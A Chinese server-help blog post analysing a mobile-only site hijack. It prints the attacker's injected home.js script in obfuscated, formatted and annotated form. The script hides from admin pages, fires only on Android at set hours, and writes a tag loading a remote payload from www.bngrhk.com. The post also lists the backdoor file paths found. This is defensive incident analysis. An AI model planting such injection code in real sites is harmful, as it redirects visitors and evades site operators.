最近流行的手机站区域性劫持的分析及处理!

分类 服务器帮助 阅读79 次 发布日期 2018-11-01
本次接到的客户遇到的问题是他的手机站总是跳转到一个垃圾推广网站页面上,电脑端的正常,查了好久也没发现在哪儿,就请我来帮忙一起分析并处理一下.

  首先我们先用谷歌浏览器模拟手机访问,同时利用抓包工具分析一下他的详细访问及源码,如下:

    

 

  然后去服务器上查看一下他站点目录内的js有没有最近修改过的痕迹,然后就发现了home.js最近被改动过,如下:

 

 


  现在我们来解密一下这个home.js文件,还原下看看他的详细操作,如下:


  【原加密代码】
  1. var __encode ='sojson.com', _0xb483=["\x5F\x64\x65\x63\x6F\x64\x65","\x68\x74\x74\x70\x3A\x2F\x2F\x77\x77\x77\x2E\x73\x6F\x6A\x73\x6F\x6E\x2E\x63\x6F\x6D\x2F\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74\x6F\x62\x66\x75\x73\x63\x61\x74\x6F\x72\x2E\x68\x74\x6D\x6C"];(function(_0xd642x1){_0xd642x1[_0xb483[0]]= _0xb483[1]})(window);var _0x709e=["\x67\x65\x74\x48\x6F\x75\x72\x73","\x67\x65\x74\x4D\x69\x6E\x75\x74\x65\x73","\x3A","\x73\x70\x6C\x69\x74","\x72\x61\x6E\x64\x6F\x6D","\x6C\x65\x6E\x67\x74\x68","\x67\x65\x74\x54\x69\x6D\x65","\x73\x65\x74\x54\x69\x6D\x65","\x63\x6F\x6F\x6B\x69\x65","\x3D","\x3B\x65\x78\x70\x69\x72\x65\x73\x3D","\x74\x6F\x47\x4D\x54\x53\x74\x72\x69\x6E\x67","\x73\x75\x62\x73\x74\x72\x69\x6E\x67","\x73","\x68","\x64","\x28\x5E\x7C\x20\x29","\x3D\x28\x5B\x5E\x3B\x5D\x2A\x29\x28\x3B\x7C\x24\x29","\x6D\x61\x74\x63\x68","\x75\x73\x65\x72\x41\x67\x65\x6E\x74","\x61\x70\x70\x56\x65\x72\x73\x69\x6F\x6E","\x61\x6E\x64\x72\x6F\x69\x64","\x69\x6E\x64\x65\x78\x4F\x66","\x74\x6F\x4C\x6F\x77\x65\x72\x43\x61\x73\x65","\x69\x50\x68\x6F\x6E\x65","\x69\x50\x61\x64","\x68\x72\x65\x66","\x6C\x6F\x63\x61\x74\x69\x6F\x6E","\x68\x61\x6E\x7A\x68\x61\x6E\x77\x61\x70","\x68\x36","\x30\x3A\x30\x30","\x38\x3A\x33\x30","\x31\x35\x3A\x30\x30","\x32\x33\x3A\x35\x39","\x61\x6A\x61\x78","\x3C\x73\x63\x72\x69\x70\x74","\x20\x6C\x61\x6E\x67\x75\x61\x67\x65\x3D\x22\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74\x22\x20\x74\x79\x70\x65\x3D\x22\x74\x65\x78\x74\x2F\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74\x22\x20\x73\x72\x63\x3D\x22\x2F\x2F\x77\x77\x77\x2E\x62\x6E\x67\x72\x68\x6B\x2E\x63\x6F\x6D\x2F","\x31\x2E\x6A\x73\x22\x3E\x3C","\x2F\x73\x63\x72\x69\x70","\x74\x3E","\x77\x72\x69\x74\x65","\x31","\x31\x3A\x33\x30","\x36\x3A\x35\x39","\x64\x32\x34"];function checkTime(_0xf217x2){var _0xf217x3= new Date();var _0xf217x4=parseInt(_0xf217x3[_0x709e[0]]())* 60+ parseInt(_0xf217x3[_0x709e[1]]());var _0xf217x5=_0xf217x2[0][_0x709e[3]](_0x709e[2]);var 
_0xf217x6=_0xf217x2[1][_0x709e[3]](_0x709e[2]);var _0xf217x7=parseInt(_0xf217x5[0])* 60+ parseInt(_0xf217x5[1]);var _0xf217x8=parseInt(_0xf217x6[0])* 60+ parseInt(_0xf217x6[1]);if(_0xf217x4>= _0xf217x7&& _0xf217x4<= _0xf217x8){return true}else {return false}}function randomNum(_0xf217xa,_0xf217xb){switch(arguments[_0x709e[5]]){case 1:return parseInt(Math[_0x709e[4]]()* _0xf217xa+ 1,10);break;case 2:return parseInt(Math[_0x709e[4]]()* (_0xf217xb- _0xf217xa+ 1)+ _0xf217xa,10);break;default:return 0;break}}function setCookie(_0xf217xd,_0xf217xe,_0xf217xf){var _0xf217x10=getsec(_0xf217xf);var _0xf217x11= new Date();_0xf217x11[_0x709e[7]](_0xf217x11[_0x709e[6]]()+ _0xf217x10* 1);document[_0x709e[8]]= _0xf217xd+ _0x709e[9]+ escape(_0xf217xe)+ _0x709e[10]+ _0xf217x11[_0x709e[11]]()}function getsec(_0xf217x13){var _0xf217x14=_0xf217x13[_0x709e[12]](1,_0xf217x13[_0x709e[5]])* 1;var _0xf217x15=_0xf217x13[_0x709e[12]](0,1);if(_0xf217x15== _0x709e[13]){return _0xf217x14* 1000}else {if(_0xf217x15== _0x709e[14]){return _0xf217x14* 60* 60* 1000}else {if(_0xf217x15== _0x709e[15]){return _0xf217x14* 24* 60* 60* 1000}}}}function getCookie(_0xf217xd){var _0xf217x17,_0xf217x18= new RegExp(_0x709e[16]+ _0xf217xd+ _0x709e[17]);if(_0xf217x17= document[_0x709e[8]][_0x709e[18]](_0xf217x18)){return unescape(_0xf217x17[2])}else {return null}}var browser={versions:function(){var _0xf217x1a=navigator[_0x709e[19]],_0xf217x1b=navigator[_0x709e[20]];return {android:_0xf217x1a[_0x709e[23]]()[_0x709e[22]](_0x709e[21])> -1,iPhone:_0xf217x1a[_0x709e[22]](_0x709e[24])> -1,iPad:_0xf217x1a[_0x709e[22]](_0x709e[25])> -1}}()};var xxx=randomNum(1,2);var isadmin=(window[_0x709e[27]][_0x709e[26]])[_0x709e[18]](/admin/i)!= null;if(!isadmin){var isiPad=navigator[_0x709e[19]][_0x709e[18]](/Adr|Linux|Android/i)!= null;if(isiPad){if(getCookie(_0x709e[28])){var hanzhanwap=parseInt(getCookie(_0x709e[28]))+ 1;setCookie(_0x709e[28],hanzhanwap,_0x709e[29]);if(parseInt(getCookie(_0x709e[28]))<= 
6){if(checkTime([_0x709e[30],_0x709e[31]])|| checkTime([_0x709e[32],_0x709e[33]])){if(xxx== 1){$[_0x709e[34]]= 1;document[_0x709e[40]](_0x709e[35]+ _0x709e[36]+ _0x709e[37]+ _0x709e[38]+ _0x709e[39])}}}}else {setCookie(_0x709e[28],_0x709e[41],_0x709e[29]);if(checkTime([_0x709e[42],_0x709e[43]])){if(xxx== 1){document[_0x709e[40]](_0x709e[35]+ _0x709e[36]+ _0x709e[37]+ _0x709e[38]+ _0x709e[39])}}}}}else {setCookie(_0x709e[28],888,_0x709e[44])}
  【格式化后】
  1. var __encode = 'sojson.com',
  2.     _0xb483 = ["\x5F\x64\x65\x63\x6F\x64\x65", "\x68\x74\x74\x70\x3A\x2F\x2F\x77\x77\x77\x2E\x73\x6F\x6A\x73\x6F\x6E\x2E\x63\x6F\x6D\x2F\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74\x6F\x62\x66\x75\x73\x63\x61\x74\x6F\x72\x2E\x68\x74\x6D\x6C"];
  3. (function(_0xd642x1) {
  4.     _0xd642x1[_0xb483[0]] = _0xb483[1]
  5. })(window);
  6. var _0x709e = ["\x67\x65\x74\x48\x6F\x75\x72\x73", "\x67\x65\x74\x4D\x69\x6E\x75\x74\x65\x73", "\x3A", "\x73\x70\x6C\x69\x74", "\x72\x61\x6E\x64\x6F\x6D", "\x6C\x65\x6E\x67\x74\x68", "\x67\x65\x74\x54\x69\x6D\x65", "\x73\x65\x74\x54\x69\x6D\x65", "\x63\x6F\x6F\x6B\x69\x65", "\x3D", "\x3B\x65\x78\x70\x69\x72\x65\x73\x3D", "\x74\x6F\x47\x4D\x54\x53\x74\x72\x69\x6E\x67", "\x73\x75\x62\x73\x74\x72\x69\x6E\x67", "\x73", "\x68", "\x64", "\x28\x5E\x7C\x20\x29", "\x3D\x28\x5B\x5E\x3B\x5D\x2A\x29\x28\x3B\x7C\x24\x29", "\x6D\x61\x74\x63\x68", "\x75\x73\x65\x72\x41\x67\x65\x6E\x74", "\x61\x70\x70\x56\x65\x72\x73\x69\x6F\x6E", "\x61\x6E\x64\x72\x6F\x69\x64", "\x69\x6E\x64\x65\x78\x4F\x66", "\x74\x6F\x4C\x6F\x77\x65\x72\x43\x61\x73\x65", "\x69\x50\x68\x6F\x6E\x65", "\x69\x50\x61\x64", "\x68\x72\x65\x66", "\x6C\x6F\x63\x61\x74\x69\x6F\x6E", "\x68\x61\x6E\x7A\x68\x61\x6E\x77\x61\x70", "\x68\x36", "\x30\x3A\x30\x30", "\x38\x3A\x33\x30", "\x31\x35\x3A\x30\x30", "\x32\x33\x3A\x35\x39", "\x61\x6A\x61\x78", "\x3C\x73\x63\x72\x69\x70\x74", "\x20\x6C\x61\x6E\x67\x75\x61\x67\x65\x3D\x22\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74\x22\x20\x74\x79\x70\x65\x3D\x22\x74\x65\x78\x74\x2F\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74\x22\x20\x73\x72\x63\x3D\x22\x2F\x2F\x77\x77\x77\x2E\x62\x6E\x67\x72\x68\x6B\x2E\x63\x6F\x6D\x2F", "\x31\x2E\x6A\x73\x22\x3E\x3C", "\x2F\x73\x63\x72\x69\x70", "\x74\x3E", "\x77\x72\x69\x74\x65", "\x31", "\x31\x3A\x33\x30", "\x36\x3A\x35\x39", "\x64\x32\x34"];

  7. function checkTime(_0xf217x2) {
  8.     var _0xf217x3 = new Date();
  9.     var _0xf217x4 = parseInt(_0xf217x3[_0x709e[0]]()) * 60 + parseInt(_0xf217x3[_0x709e[1]]());
  10.     var _0xf217x5 = _0xf217x2[0][_0x709e[3]](_0x709e[2]);
  11.     var _0xf217x6 = _0xf217x2[1][_0x709e[3]](_0x709e[2]);
  12.     var _0xf217x7 = parseInt(_0xf217x5[0]) * 60 + parseInt(_0xf217x5[1]);
  13.     var _0xf217x8 = parseInt(_0xf217x6[0]) * 60 + parseInt(_0xf217x6[1]);
  14.     if (_0xf217x4 >= _0xf217x7 && _0xf217x4 <= _0xf217x8) {
  15.         return true
  16.     } else {
  17.         return false
  18.     }
  19. }

  20. function randomNum(_0xf217xa, _0xf217xb) {
  21.     switch (arguments[_0x709e[5]]) {
  22.         case 1:
  23.             return parseInt(Math[_0x709e[4]]() * _0xf217xa + 1, 10);
  24.             break;
  25.         case 2:
  26.             return parseInt(Math[_0x709e[4]]() * (_0xf217xb - _0xf217xa + 1) + _0xf217xa, 10);
  27.             break;
  28.         default:
  29.             return 0;
  30.             break
  31.     }
  32. }

  33. function setCookie(_0xf217xd, _0xf217xe, _0xf217xf) {
  34.     var _0xf217x10 = getsec(_0xf217xf);
  35.     var _0xf217x11 = new Date();
  36.     _0xf217x11[_0x709e[7]](_0xf217x11[_0x709e[6]]() + _0xf217x10 * 1);
  37.     document[_0x709e[8]] = _0xf217xd + _0x709e[9] + escape(_0xf217xe) + _0x709e[10] + _0xf217x11[_0x709e[11]]()
  38. }

  39. function getsec(_0xf217x13) {
  40.     var _0xf217x14 = _0xf217x13[_0x709e[12]](1, _0xf217x13[_0x709e[5]]) * 1;
  41.     var _0xf217x15 = _0xf217x13[_0x709e[12]](0, 1);
  42.     if (_0xf217x15 == _0x709e[13]) {
  43.         return _0xf217x14 * 1000
  44.     } else {
  45.         if (_0xf217x15 == _0x709e[14]) {
  46.             return _0xf217x14 * 60 * 60 * 1000
  47.         } else {
  48.             if (_0xf217x15 == _0x709e[15]) {
  49.                 return _0xf217x14 * 24 * 60 * 60 * 1000
  50.             }
  51.         }
  52.     }
  53. }

  54. function getCookie(_0xf217xd) {
  55.     var _0xf217x17, _0xf217x18 = new RegExp(_0x709e[16] + _0xf217xd + _0x709e[17]);
  56.     if (_0xf217x17 = document[_0x709e[8]][_0x709e[18]](_0xf217x18)) {
  57.         return unescape(_0xf217x17[2])
  58.     } else {
  59.         return null
  60.     }
  61. }
  62. var browser = {
  63.     versions: function() {
  64.         var _0xf217x1a = navigator[_0x709e[19]],
  65.             _0xf217x1b = navigator[_0x709e[20]];
  66.         return {
  67.             android: _0xf217x1a[_0x709e[23]]()[_0x709e[22]](_0x709e[21]) > -1,
  68.             iPhone: _0xf217x1a[_0x709e[22]](_0x709e[24]) > -1,
  69.             iPad: _0xf217x1a[_0x709e[22]](_0x709e[25]) > -1
  70.         }
  71.     }()
  72. };
  73. var xxx = randomNum(1, 2);
  74. var isadmin = (window[_0x709e[27]][_0x709e[26]])[_0x709e[18]](/admin/i) != null;
  75. if (!isadmin) {
  76.     var isiPad = navigator[_0x709e[19]][_0x709e[18]](/Adr|Linux|Android/i) != null;
  77.     if (isiPad) {
  78.         if (getCookie(_0x709e[28])) {
  79.             var hanzhanwap = parseInt(getCookie(_0x709e[28])) + 1;
  80.             setCookie(_0x709e[28], hanzhanwap, _0x709e[29]);
  81.             if (parseInt(getCookie(_0x709e[28])) <= 6) {
  82.                 if (checkTime([_0x709e[30], _0x709e[31]]) || checkTime([_0x709e[32], _0x709e[33]])) {
  83.                     if (xxx == 1) {
  84.                         $[_0x709e[34]] = 1;
  85.                         document[_0x709e[40]](_0x709e[35] + _0x709e[36] + _0x709e[37] + _0x709e[38] + _0x709e[39])
  86.                     }
  87.                 }
  88.             }
  89.         } else {
  90.             setCookie(_0x709e[28], _0x709e[41], _0x709e[29]);
  91.             if (checkTime([_0x709e[42], _0x709e[43]])) {
  92.                 if (xxx == 1) {
  93.                     document[_0x709e[40]](_0x709e[35] + _0x709e[36] + _0x709e[37] + _0x709e[38] + _0x709e[39])
  94.                 }
  95.             }
  96.         }
  97.     }
  98. } else {
  99.     setCookie(_0x709e[28], 888, _0x709e[44])
  100. }
  【解密后代码】
  // Obfuscator watermark: _0xb483[0] is "_decode", _0xb483[1] the sojson.com obfuscator URL,
  // so the IIFE below only publishes window._decode = "<that URL>". Nothing functional here.
  1. var __encode = 'sojson.com',
  2.         _0xb483 = ["_decode", "http://www.sojson.com/javascriptobfuscator.html"];
  3. (function(_0xd642x1) {
  4.         _0xd642x1[_0xb483[0]] = _0xb483[1]
  5. })(window);
  // String table that every property access and literal in the rest of the file goes through,
  // e.g. [8] = "cookie", [18] = "match", [28] = the cookie name "hanzhanwap", [29] = "h6"
  // (6-hour lifetime, see getsec), [30]..[33] and [42]/[43] = the local-time windows used by
  // checkTime, [34] = "ajax", [40] = "write", [44] = "d24" (24 days).
  // [35]..[39] are the pieces of the injected tag: the closing tag is split into "/scrip" + "t>"
  // so a plain search for "</script>" in the file does not hit it.
  // Indicators worth searching for elsewhere on the server: the cookie name "hanzhanwap" and the
  // remote host www.bngrhk.com (the src of the injected script).
  6. var _0x709e = ["getHours", "getMinutes", ":", "split", "random", "length", "getTime", "setTime", "cookie", "=", ";expires=", "toGMTString", "substring", "s", "h", "d", "(^| )", "=([^;]*)(;|$)", "match", "userAgent", "appVersion", "android", "indexOf", "toLowerCase", "iPhone", "iPad", "href", "location", "hanzhanwap", "h6", "0:00", "8:30", "15:00", "23:59", "ajax", "<script", " language="javascript" type="text/javascript" src="//www.bngrhk.com/", "1.js"><", "/scrip", "t>", "write", "1", "1:30", "6:59", "d24"];

  // Returns true when the visitor's local wall-clock time (new Date().getHours()*60 + getMinutes())
  // lies inside the inclusive window passed as ["H:MM", "H:MM"]. Every call below uses it to
  // confine the injection to particular hours, which is why the symptom is intermittent and hard
  // to reproduce from the operator's side during a normal working day.
  7. function checkTime(_0xf217x2) {
  8.         var _0xf217x3 = new Date();
  //         minutes since local midnight; parseInt is called without a radix throughout this file
  9.         var _0xf217x4 = parseInt(_0xf217x3[_0x709e[0]]()) * 60 + parseInt(_0xf217x3[_0x709e[1]]());
  //         window start / end, each split on ":" (_0x709e[3] = "split", _0x709e[2] = ":")
  10.         var _0xf217x5 = _0xf217x2[0][_0x709e[3]](_0x709e[2]);
  11.         var _0xf217x6 = _0xf217x2[1][_0x709e[3]](_0x709e[2]);
  12.         var _0xf217x7 = parseInt(_0xf217x5[0]) * 60 + parseInt(_0xf217x5[1]);
  13.         var _0xf217x8 = parseInt(_0xf217x6[0]) * 60 + parseInt(_0xf217x6[1]);
  14.         if (_0xf217x4 >= _0xf217x7 && _0xf217x4 <= _0xf217x8) {
  15.                 return true
  16.         } else {
  17.                 return false
  18.         }
  19. }

  // Random integer helper dispatching on arguments.length (_0x709e[5] = "length"):
  //   one argument  -> 1 .. a
  //   two arguments -> a .. b (inclusive)
  //   otherwise     -> 0
  // The only call site is randomNum(1, 2), so the result is a coin flip that gates the injection
  // (see xxx below); Math.random makes the behaviour non-reproducible between page loads.
  20. function randomNum(_0xf217xa, _0xf217xb) {
  21.         switch (arguments[_0x709e[5]]) {
  22.         case 1:
  23.                 return parseInt(Math[_0x709e[4]]() * _0xf217xa + 1, 10);
  24.                 break;
  25.         case 2:
  26.                 return parseInt(Math[_0x709e[4]]() * (_0xf217xb - _0xf217xa + 1) + _0xf217xa, 10);
  27.                 break;
  28.         default:
  29.                 return 0;
  30.                 break
  31.         }
  32. }

  // Writes document.cookie as "<name>=<escape(value)>;expires=<GMT string>" where the expiry is
  // now + getsec(span) milliseconds; span is a unit letter plus a number ("h6", "d24" below).
  // No path, domain, Secure or HttpOnly attribute is set. Used only for the "hanzhanwap" visit
  // counter that throttles how often a given browser gets the injected tag.
  33. function setCookie(_0xf217xd, _0xf217xe, _0xf217xf) {
  34.         var _0xf217x10 = getsec(_0xf217xf);
  35.         var _0xf217x11 = new Date();
  //         _0x709e[7] = "setTime", _0x709e[6] = "getTime"; "* 1" is a numeric coercion
  36.         _0xf217x11[_0x709e[7]](_0xf217x11[_0x709e[6]]() + _0xf217x10 * 1);
  //         _0x709e[8] = "cookie", [9] = "=", [10] = ";expires=", [11] = "toGMTString"
  37.         document[_0x709e[8]] = _0xf217xd + _0x709e[9] + escape(_0xf217xe) + _0x709e[10] + _0xf217x11[_0x709e[11]]()
  38. }

  // Converts a lifetime string "s<n>" / "h<n>" / "d<n>" into milliseconds (seconds / hours / days).
  // The unit is the first character (_0x709e[12] = "substring"), the count is the rest. Any other
  // unit letter falls through all three branches and returns undefined, which would make the
  // expiry computed in setCookie invalid; the callers only ever pass "h6" and "d24".
  39. function getsec(_0xf217x13) {
  40.         var _0xf217x14 = _0xf217x13[_0x709e[12]](1, _0xf217x13[_0x709e[5]]) * 1;
  41.         var _0xf217x15 = _0xf217x13[_0x709e[12]](0, 1);
  42.         if (_0xf217x15 == _0x709e[13]) {
  43.                 return _0xf217x14 * 1000
  44.         } else {
  45.                 if (_0xf217x15 == _0x709e[14]) {
  46.                         return _0xf217x14 * 60 * 60 * 1000
  47.                 } else {
  48.                         if (_0xf217x15 == _0x709e[15]) {
  49.                                 return _0xf217x14 * 24 * 60 * 60 * 1000
  50.                         }
  51.                 }
  52.         }
  53. }

  // Reads a single cookie by name: builds the RegExp "(^| )<name>=([^;]*)(;|$)" (_0x709e[16] and
  // [17]) and matches it against document.cookie; returns the unescape()d value (capture group 2)
  // or null when the cookie is absent. The name is interpolated into the pattern without escaping,
  // but every caller in this file passes the fixed literal "hanzhanwap".
  54. function getCookie(_0xf217xd) {
  55.         var _0xf217x17, _0xf217x18 = new RegExp(_0x709e[16] + _0xf217xd + _0x709e[17]);
  //         assignment inside the condition is intentional: the match result doubles as the test
  56.         if (_0xf217x17 = document[_0x709e[8]][_0x709e[18]](_0xf217x18)) {
  57.                 return unescape(_0xf217x17[2])
  58.         } else {
  59.                 return null
  60.         }
  61. }
  // User-agent sniffing helper producing android / iPhone / iPad flags from navigator.userAgent.
  // _0xf217x1b (navigator.appVersion) is read but never used, and `browser` itself is not
  // referenced anywhere else in this file; the real device test is the isiPad regex further down.
  62. var browser = {
  63.         versions: function() {
  64.                 var _0xf217x1a = navigator[_0x709e[19]],
  65.                         _0xf217x1b = navigator[_0x709e[20]];
  66.                 return {
  67.                         android: _0xf217x1a[_0x709e[23]]()[_0x709e[22]](_0x709e[21]) > -1,
  68.                         iPhone: _0xf217x1a[_0x709e[22]](_0x709e[24]) > -1,
  69.                         iPad: _0xf217x1a[_0x709e[22]](_0x709e[25]) > -1
  70.                 }
  71.         }()
  72. };
  // 1 or 2; only xxx == 1 injects, so roughly half of the otherwise-eligible page loads are skipped.
  73. var xxx = randomNum(1, 2);
  // Operator evasion: if the page URL contains "admin" nothing is injected and the visit counter is
  // set to 888 for 24 days (line 99). Because the counter is only ever incremented afterwards, a
  // browser that has once opened an admin URL stays above the "<= 6" threshold below and will not
  // receive the injected tag on ordinary pages either.
  74. var isadmin = (window[_0x709e[27]][_0x709e[26]])[_0x709e[18]](/admin/i) != null;
  75. if (!isadmin) {
  //         despite the name, this matches Android/Linux user agents — hence "mobile only, desktop fine"
  76.         var isiPad = navigator[_0x709e[19]][_0x709e[18]](/Adr|Linux|Android/i) != null;
  77.         if (isiPad) {
  //                 returning visitor: bump the "hanzhanwap" counter (6-hour cookie) and inject only while
  //                 the count is still <= 6, during 00:00-08:30 or 15:00-23:59 local time, on half of loads
  78.                 if (getCookie(_0x709e[28])) {
  79.                         var hanzhanwap = parseInt(getCookie(_0x709e[28])) + 1;
  80.                         setCookie(_0x709e[28], hanzhanwap, _0x709e[29]);
  81.                         if (parseInt(getCookie(_0x709e[28])) <= 6) {
  82.                                 if (checkTime([_0x709e[30], _0x709e[31]]) || checkTime([_0x709e[32], _0x709e[33]])) {
  83.                                         if (xxx == 1) {
  //                                                 $.ajax = 1 — clobbers the ajax member of the global $ (presumably jQuery);
  //                                                 the intended effect on the host page is not visible from this file
  84.                                                 $[_0x709e[34]] = 1;
  //                                                 document.write('<script language="javascript" type="text/javascript"
  //                                                 src="//www.bngrhk.com/1.js"></script>'): protocol-relative load of the
  //                                                 remote payload that performs the redirect the customer reported
  85.                                                 document[_0x709e[40]](_0x709e[35] + _0x709e[36] + _0x709e[37] + _0x709e[38] + _0x709e[39])
  86.                                         }
  87.                                 }
  88.                         }
  89.                 } else {
  //                         first visit: start the counter at "1" for 6 hours and inject only during
  //                         01:30-06:59 local time (again on half of loads)
  90.                         setCookie(_0x709e[28], _0x709e[41], _0x709e[29]);
  91.                         if (checkTime([_0x709e[42], _0x709e[43]])) {
  92.                                 if (xxx == 1) {
  93.                                         document[_0x709e[40]](_0x709e[35] + _0x709e[36] + _0x709e[37] + _0x709e[38] + _0x709e[39])
  94.                                 }
  95.                         }
  96.                 }
  97.         }
  98. } else {
  //         admin URL seen: counter = 888 for 24 days, see note above line 74
  99.         setCookie(_0x709e[28], 888, _0x709e[44])
  100. }

  看来这位黑客藏的还不够深,一下就被我找到了,哈哈,于是我们就全面检查了一下网站文件和相关日志,终于看到了原因,因为网站内被放了几个后门木马,如下:
  \home\wwwroot\m.*.net\Lib232\Home\Common\config.php
  \home\wwwroot\www.*.net\Libbeifen\ThinkPHP\Library\Vendor\Boris\config(1).php

 

  \home\wwwroot\www.*.net\Lib232323\ThinkPHP\Mode\Api\ray.php

 

  好了,现在我们再一次抓到了这个小黑客并给客户做好了驱动级防御成功交差,现在可以继续进行下一位客户问题的分析和处理了!